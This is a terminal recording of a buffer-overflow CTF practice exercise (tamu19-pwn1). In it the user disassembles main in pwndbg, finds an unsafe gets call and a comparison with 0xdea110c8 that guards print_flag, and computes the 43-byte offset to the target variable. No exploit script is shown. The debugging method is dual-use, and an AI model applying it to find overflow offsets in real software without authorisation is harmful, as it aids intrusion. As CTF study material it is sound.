[104.959586, "o", "   \u001b[0m0x565558cc\u001b[0m \u001b[0m<main+339> \u001b[0m   \u001b[38;5;148m\u001b[1mcall\u001b[0m\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m\u001b[31mputs@plt\u001b[0m\u001b[39m                    <\u001b[31mputs@plt\u001b[0m>\r\n \r\n   \u001b[0m0x565558d1\u001b[0m \u001b[0m<main+344> \u001b[0m   \u001b[38;5;148madd\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x10\u001b[39m\r\n   \u001b[0m0x565558d4\u001b[0m \u001b[0m<main+347> \u001b[0m   \u001b[38;5;148mmov\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81meax\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0\u001b[39m                  \u001b[31m\u001b[1mEAX\u001b[0m\u001b[31m\u001b[0m => 0\r\n   \u001b[0m0x565558d9\u001b[0m \u001b[0m<main+352> \u001b[0m   \u001b[38;5;148mlea\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m[\u001b[39m\u001b[38;5;81mebp\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m-\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m8\u001b[39m\u001b[38;5;15m]\u001b[39m\r\n   \u001b[0m0x565558dc\u001b[0m \u001b[0m<main+355> \u001b[0m   \u001b[38;5;148mpop\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mecx\u001b[39m\r\n   \u001b[0m0x565558dd\u001b[0m \u001b[0m<main+356> \u001b[0m   \u001b[38;5;148mpop\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mebx\u001b[39m\r\n   \u001b[0m0x565558de\u001b[0m \u001b[0m<main+357> \u001b[0m   \u001b[38;5;148mpop\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mebp\u001b[39m\r\n\u001b[34m─────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────\u001b[0m\r\n\u001b[0m00\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0000\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m \u001b[1mesp  \u001b[0m \u001b[33m0xffffcd50\u001b[0m\u001b[0m ◂— \u001b[0m0x20 /* ' ' */\r\n\u001b[0m01\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0004\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-044   \u001b[33m0xffffcd54\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n\u001b[0m02\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0008\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-040   \u001b[33m0xffffcd58\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n\u001b[0m03\u001b[0m\u001b[0m:\u001b[0m\u001b[0m000c\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m \u001b[1meax-1\u001b[0m \u001b[33m0xffffcd5c\u001b[0m\u001b[0m ◂— \u001b[0m0x414141b1\r\n\u001b[0m04\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0010\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-038   \u001b[33m0xffffcd60\u001b[0m\u001b[0m ◂— \u001b[0m'AAAAAAAAAAAAAAAAAAAAAAAAAAA'\r\n\u001b[0m... ↓          3 skipped\u001b[0m\r\n\u001b[34m───────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────\u001b[0m\r\n ► 0 0x565558b9 main+320\r\n   1 0xf7d8ccc3 None\r\n   2 0xf7d8cd88 __libc_start_main+136\r\n   3 0x565555f1 _start+49\r\n"]
[104.959688, "o", "\u001b[34m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\r\n\u001b[?2004l\r"]
[104.960021, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[107.17561, "o", "d"]
[107.295882, "o", "i"]
[107.412324, "o", "s"]
[107.654588, "o", "a"]
[107.836428, "o", "s"]
[107.987197, "o", "s"]
[108.072966, "o", " "]
[108.289885, "o", "m"]
[108.413656, "o", "a"]
[109.095725, "o", "i"]
[109.25389, "o", "n"]
[109.510751, "o", "\r\n\u001b[?2004l\r"]
[109.5113, "o", "Dump of assembler code for function \u001b[33mmain\u001b[m:\r\n   \u001b[34m0x56555779\u001b[m <+0>:\t\u001b[32mlea    \u001b[m\u001b[31mecx\u001b[m,[\u001b[31mesp\u001b[m+\u001b[34m0x4\u001b[m]\r\n   \u001b[34m0x5655577d\u001b[m <+4>:\t\u001b[32mand    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xfffffff0\u001b[m\r\n   \u001b[34m0x56555780\u001b[m <+7>:\t\u001b[32mpush   \u001b[mDWORD PTR [\u001b[31mecx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x4\u001b[m]\r\n   \u001b[34m0x56555783\u001b[m <+10>:\t\u001b[32mpush   \u001b[m\u001b[31mebp\u001b[m\r\n   \u001b[34m0x56555784\u001b[m <+11>:\t\u001b[32mmov    \u001b[m\u001b[31mebp\u001b[m,\u001b[31mesp\u001b[m\r\n   \u001b[34m0x56555786\u001b[m <+13>:\t\u001b[32mpush   \u001b[m\u001b[31mebx\u001b[m\r\n   \u001b[34m0x56555787\u001b[m <+14>:\t\u001b[32mpush   \u001b[m\u001b[31mecx\u001b[m\r\n   \u001b[34m0x56555788\u001b[m <+15>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x40\u001b[m\r\n   \u001b[34m0x5655578b\u001b[m <+18>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555600\u001b[m <\u001b[33m__x86.get_pc_thunk.bx\u001b[m>\r\n   \u001b[34m0x56555790\u001b[m <+23>:\t\u001b[32madd    \u001b[m\u001b[31mebx\u001b[m,\u001b[34m0x1820\u001b[m\r\n   \u001b[34m0x56555796\u001b[m <+29>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31mebx\u001b[m+\u001b[34m0x44\u001b[m]\r\n   \u001b[34m0x5655579c\u001b[m <+35>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31meax\u001b[m]\r\n   \u001b[34m0x5655579e\u001b[m <+37>:\t\u001b[32mpush   \u001b[m\u001b[34m0x0\u001b[m\r\n   \u001b[34m0x565557a0\u001b[m <+39>:\t\u001b[32mpush   \u001b[m\u001b[34m0x0\u001b[m\r\n"]
[109.511413, "o", "   \u001b[34m0x565557a2\u001b[m <+41>:\t\u001b[32mpush   \u001b[m\u001b[34m0x2\u001b[m\r\n   \u001b[34m0x565557a4\u001b[m <+43>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x565557a5\u001b[m <+44>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555580\u001b[m <\u001b[33msetvbuf@plt\u001b[m>\r\n   \u001b[34m0x565557aa\u001b[m <+49>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x565557ad\u001b[m <+52>:\t\u001b[32mmov    \u001b[mDWORD PTR [\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0xc\u001b[m],\u001b[34m0x2\u001b[m\r\n"]
[109.511644, "o", "   \u001b[34m0x565557b4\u001b[m <+59>:\t\u001b[32mmov    \u001b[mDWORD PTR [\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x10\u001b[m],\u001b[34m0x0\u001b[m\r\n   \u001b[34m0x565557bb\u001b[m <+66>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x565557be\u001b[m <+69>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1620\u001b[m]\r\n   \u001b[34m0x565557c4\u001b[m <+75>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x565557c5\u001b[m <+76>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x565557ca\u001b[m <+81>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x565557cd\u001b[m <+84>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x565557d0\u001b[m <+87>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x15b5\u001b[m]\r\n"]
[109.511743, "o", "   \u001b[34m0x565557d6\u001b[m <+93>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x565557d7\u001b[m <+94>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x565557dc\u001b[m <+99>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x565557df\u001b[m <+102>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31mebx\u001b[m+\u001b[34m0x40\u001b[m]\r\n"]
[109.511956, "o", "   \u001b[34m0x565557e5\u001b[m <+108>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31meax\u001b[m]\r\n   \u001b[34m0x565557e7\u001b[m <+110>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n   \u001b[34m0x565557ea\u001b[m <+113>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x565557eb\u001b[m <+114>:\t\u001b[32mpush   \u001b[m\u001b[34m0x2b\u001b[m\r\n   \u001b[34m0x565557ed\u001b[m <+116>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x3b\u001b[m]\r\n   \u001b[34m0x565557f0\u001b[m <+119>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x565557f1\u001b[m <+120>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555530\u001b[m <\u001b[33mfgets@plt\u001b[m>\r\n   \u001b[34m0x565557f6\u001b[m <+125>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n"]
[109.512035, "o", "   \u001b[34m0x565557f9\u001b[m <+128>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x8\u001b[m\r\n"]
[109.512194, "o", "   \u001b[34m0x565557fc\u001b[m <+131>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x159f\u001b[m]\r\n   \u001b[34m0x56555802\u001b[m <+137>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555803\u001b[m <+138>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x3b\u001b[m]\r\n   \u001b[34m0x56555806\u001b[m <+141>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n"]
[109.51228, "o", "   \u001b[34m0x56555807\u001b[m <+142>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555510\u001b[m <\u001b[33mstrcmp@plt\u001b[m>\r\n   \u001b[34m0x5655580c\u001b[m <+147>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x5655580f\u001b[m <+150>:\t\u001b[32mtest   \u001b[m\u001b[31meax\u001b[m,\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555811\u001b[m <+152>:\t\u001b[32mje     \u001b[m\u001b[34m0x5655582f\u001b[m <\u001b[33mmain\u001b[m+182>\r\n   \u001b[34m0x56555813\u001b[m <+154>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x56555816\u001b[m <+157>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1584\u001b[m]\r\n"]
[109.512371, "o", "   \u001b[34m0x5655581c\u001b[m <+163>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x5655581d\u001b[m <+164>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x56555822\u001b[m <+169>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x56555825\u001b[m <+172>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n"]
[109.512565, "o", "   \u001b[34m0x56555828\u001b[m <+175>:\t\u001b[32mpush   \u001b[m\u001b[34m0x0\u001b[m\r\n   \u001b[34m0x5655582a\u001b[m <+177>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555560\u001b[m <\u001b[33mexit@plt\u001b[m>\r\n   \u001b[34m0x5655582f\u001b[m <+182>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x56555832\u001b[m <+185>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1564\u001b[m]\r\n   \u001b[34m0x56555838\u001b[m <+191>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555839\u001b[m <+192>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n"]
[109.512635, "o", "   \u001b[34m0x5655583e\u001b[m <+197>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x56555841\u001b[m <+200>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31mebx\u001b[m+\u001b[34m0x40\u001b[m]\r\n   \u001b[34m0x56555847\u001b[m <+206>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,DWORD PTR [\u001b[31meax\u001b[m]\r\n"]
[109.512703, "o", "   \u001b[34m0x56555849\u001b[m <+208>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n   \u001b[34m0x5655584c\u001b[m <+211>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x5655584d\u001b[m <+212>:\t\u001b[32mpush   \u001b[m\u001b[34m0x2b\u001b[m\r\n"]
[109.512892, "o", "   \u001b[34m0x5655584f\u001b[m <+214>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x3b\u001b[m]\r\n   \u001b[34m0x56555852\u001b[m <+217>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555853\u001b[m <+218>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555530\u001b[m <\u001b[33mfgets@plt\u001b[m>\r\n   \u001b[34m0x56555858\u001b[m <+223>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x5655585b\u001b[m <+226>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x8\u001b[m\r\n"]
[109.513083, "o", "   \u001b[34m0x5655585e\u001b[m <+229>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x154d\u001b[m]\r\n   \u001b[34m0x56555864\u001b[m <+235>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n"]
[109.513169, "o", "   \u001b[34m0x56555865\u001b[m <+236>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x3b\u001b[m]\r\n   \u001b[34m0x56555868\u001b[m <+239>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555869\u001b[m <+240>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555510\u001b[m <\u001b[33mstrcmp@plt\u001b[m>\r\n   \u001b[34m0x5655586e\u001b[m <+245>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x56555871\u001b[m <+248>:\t\u001b[32mtest   \u001b[m\u001b[31meax\u001b[m,\u001b[31meax\u001b[m\r\n   \u001b[34m0x56555873\u001b[m <+250>:\t\u001b[32mje     \u001b[m\u001b[34m0x56555891\u001b[m <\u001b[33mmain\u001b[m+280>\r\n   \u001b[34m0x56555875\u001b[m <+252>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x56555878\u001b[m <+255>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1584\u001b[m]\r\n   \u001b[34m0x5655587e\u001b[m <+261>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n"]
[109.513347, "o", "   \u001b[34m0x5655587f\u001b[m <+262>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x56555884\u001b[m <+267>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x56555887\u001b[m <+270>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x5655588a\u001b[m <+273>:\t\u001b[32mpush   \u001b[m\u001b[34m0x0\u001b[m\r\n   \u001b[34m0x5655588c\u001b[m <+275>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555560\u001b[m <\u001b[33mexit@plt\u001b[m>\r\n   \u001b[34m0x56555891\u001b[m <+280>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n"]
[109.513416, "o", "   \u001b[34m0x56555894\u001b[m <+283>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1534\u001b[m]\r\n   \u001b[34m0x5655589a\u001b[m <+289>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x5655589b\u001b[m <+290>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n"]
[109.513566, "o", "   \u001b[34m0x565558a0\u001b[m <+295>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x565558a3\u001b[m <+298>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x565558a6\u001b[m <+301>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x3b\u001b[m]\r\n   \u001b[34m0x565558a9\u001b[m <+304>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x565558aa\u001b[m <+305>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555520\u001b[m <\u001b[33mgets@plt\u001b[m>\r\n"]
[109.513657, "o", "   \u001b[34m0x565558af\u001b[m <+310>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x565558b2\u001b[m <+313>:\t\u001b[32mcmp    \u001b[mDWORD PTR [\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x10\u001b[m],\u001b[34m0xdea110c8\u001b[m\r\n=> \u001b[34m0x565558b9\u001b[m <+320>:\t\u001b[32mjne    \u001b[m\u001b[34m0x565558c2\u001b[m <\u001b[33mmain\u001b[m+329>\r\n"]
[109.513737, "o", "   \u001b[34m0x565558bb\u001b[m <+322>:\t\u001b[32mcall   \u001b[m\u001b[34m0x565556fd\u001b[m <\u001b[33mprint_flag\u001b[m>\r\n   \u001b[34m0x565558c0\u001b[m <+327>:\t\u001b[32mjmp    \u001b[m\u001b[34m0x565558d4\u001b[m <\u001b[33mmain\u001b[m+347>\r\n"]
[109.513889, "o", "   \u001b[34m0x565558c2\u001b[m <+329>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0xc\u001b[m\r\n   \u001b[34m0x565558c5\u001b[m <+332>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1584\u001b[m]\r\n   \u001b[34m0x565558cb\u001b[m <+338>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x565558cc\u001b[m <+339>:\t\u001b[32mcall   \u001b[m\u001b[34m0x56555550\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x565558d1\u001b[m <+344>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n"]
[109.513965, "o", "   \u001b[34m0x565558d4\u001b[m <+347>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,\u001b[34m0x0\u001b[m\r\n"]
[109.514116, "o", "   \u001b[34m0x565558d9\u001b[m <+352>:\t\u001b[32mlea    \u001b[m\u001b[31mesp\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x8\u001b[m]\r\n   \u001b[34m0x565558dc\u001b[m <+355>:\t\u001b[32mpop    \u001b[m\u001b[31mecx\u001b[m\r\n   \u001b[34m0x565558dd\u001b[m <+356>:\t\u001b[32mpop    \u001b[m\u001b[31mebx\u001b[m\r\n   \u001b[34m0x565558de\u001b[m <+357>:\t\u001b[32mpop    \u001b[m\u001b[31mebp\u001b[m\r\n   \u001b[34m0x565558df\u001b[m <+358>:\t\u001b[32mlea    \u001b[m\u001b[31mesp\u001b[m,[\u001b[31mecx\u001b[m\u001b[34m-\u001b[m\u001b[34m0x4\u001b[m]\r\n   \u001b[34m0x565558e2\u001b[m <+361>:\t\u001b[32mret\u001b[m\r\nEnd of assembler dump.\r\n"]
[109.514397, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[115.082584, "o", "x"]
[115.254848, "o", "/"]
[116.089419, "o", "\b\u001b[K"]
[119.844998, "o", "/"]
[120.83305, "o", "w"]
[121.031986, "o", "x"]
[121.24346, "o", " "]
[121.891966, "o", "\u001b[7mebp-0x10\u001b[27m"]
[123.268246, "o", "\b\b\b\b\b\b\b\b\u001b[1Pebp-0x1"]
[123.768789, "o", "\b\u001b[K"]
[123.798896, "o", "\b\u001b[K"]
[123.828826, "o", "\b\u001b[K"]
[123.859247, "o", "\b\u001b[K"]
[124.03934, "o", "\b\u001b[K"]
[124.236109, "o", "\b\u001b[K"]
[124.377568, "o", "\b\u001b[K"]
[125.235959, "o", "$"]
[125.667973, "o", "\u001b[7mebp-0x10\u001b[27m"]
[126.071465, "o", "\b\b\b\b\b\b\b\bebp-0x10\r\n\u001b[?2004l\r"]
[126.071737, "o", "\u001b[34m0xffffcd88\u001b[m:\t0x00000000\r\n"]
[126.07196, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[127.422607, "o", "x"]
[127.553445, "o", "/"]
[128.200892, "o", "w"]
[128.392349, "o", "x"]
[128.890171, "o", " "]
[129.547048, "o", "$"]
[138.286805, "o", "\u001b[7mebp-0x3b\u001b[27m"]
[139.309765, "o", "\b\b\b\b\b\b\b\bebp-0x3b\r\n\u001b[?2004l\r"]
[139.310141, "o", "\u001b[34m0xffffcd5d\u001b[m:\t0x41414141\r\n"]
[139.31044, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[140.355635, "o", "p"]
[140.535941, "o", " "]
[144.630149, "o", "\u001b[7m0xffffcd88\u001b[27m"]
[145.420318, "o", "\b\b\b\b\b\b\b\b\b\b0xffffcd88 "]
[145.657979, "o", "-"]
[145.889588, "o", " "]
[149.778949, "o", "\u001b[7m0xffffcd5d\u001b[27m"]
[150.277312, "o", "\b\b\b\b\b\b\b\b\b\b0xffffcd5d\r\n\u001b[?2004l\r"]
[150.277622, "o", "\u001b[36m$1\u001b[m = 43\r\n"]
[150.277792, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[151.837614, "o", "p 0xffffcd88 - 0xffffcd5d"]
[152.288027, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[11Px/wx $ebp-0x3b"]
[152.72145, "o", "\b"]
[153.221658, "o", "\b"]
[153.251698, "o", "\b"]
[153.282935, "o", "\b"]
[153.313056, "o", "\b"]
[153.342574, "o", "\b"]
[153.373545, "o", "\b"]
[153.404464, "o", "\b"]
[153.43551, "o", "\b"]
[153.466099, "o", "\b"]
[153.495133, "o", "\b"]
[153.857464, "o", "\b"]
[154.471009, "o", "\u001b[1@2"]
[154.628821, "o", "\u001b[1@0"]
[155.191756, "o", "\r\n\u001b[?2004l\r"]
[155.192259, "o", "\u001b[34m0xffffcd5d\u001b[m:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n"]
[155.192348, "o", "\u001b[34m0xffffcd6d\u001b[m:\t0x41414141\t0x41414141\t0x41414141\t0x00004141\r\n"]
[155.19263, "o", "\u001b[34m0xffffcd7d\u001b[m:\t0x00000000\t0x00000000\t0x00000000\t0x02000000\r\n\u001b[34m0xffffcd8d\u001b[m:\t0xb0000000\t0x14ffffcd\t0x00f7f9ae\t0xc3000000\r\n"]
[155.192911, "o", "\u001b[34m0xffffcd9d\u001b[m:\t0x00f7d8cc\t0x64000000\t0x29ffffce\t0xc3f7da60\r\n"]
[155.193131, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[156.779992, "o", "e"]
[156.879656, "o", "x"]
[157.126721, "o", "i"]
[157.33824, "o", "t"]
[157.717494, "o", "\r\n\u001b[?2004l\r"]
[157.995361, "o", "                                                                                                                                           \r\r"]
[157.995733, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u0007\r\n"]
[158.01897, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[158.986935, "o", "c"]
[158.993203, "o", "\b\u001b[4mc\u001b[24m"]
[158.99354, "o", "\b\u001b[4mc\u001b[24m\u001b[38;2;153;153;153mat pwn1.py\u001b[39m\u001b[10D"]
[159.176885, "o", "\b\u001b[4mc\u001b[39m\u001b[4ma\u001b[24m"]
[159.250019, "o", "\b\b\u001b[4mc\u001b[4ma\u001b[39m\u001b[4mt\u001b[24m"]
[159.252718, "o", "\b\b\b\u001b[24m\u001b[36mc\u001b[24m\u001b[36ma\u001b[24m\u001b[36mt\u001b[39m"]
[159.481968, "o", "\b\u001b[36mt\u001b[36m \u001b[39m"]
[159.484561, "o", "\b\b\u001b[36mt\u001b[39m\u001b[39m "]
[159.995226, "o", "\u001b[39mw\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b"]
[159.99953, "o", "\u001b[38;2;153;153;153meird_ap\u001b[39m\u001b[38;2;153;153;153mp.txt\u001b[39m\u001b[12D"]
[160.388643, "o", "\b \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[13D"]
[160.392189, "o", "\u001b[38;2;153;153;153mpwn1.py\u001b[39m\b\b\b\b\b\b\b"]
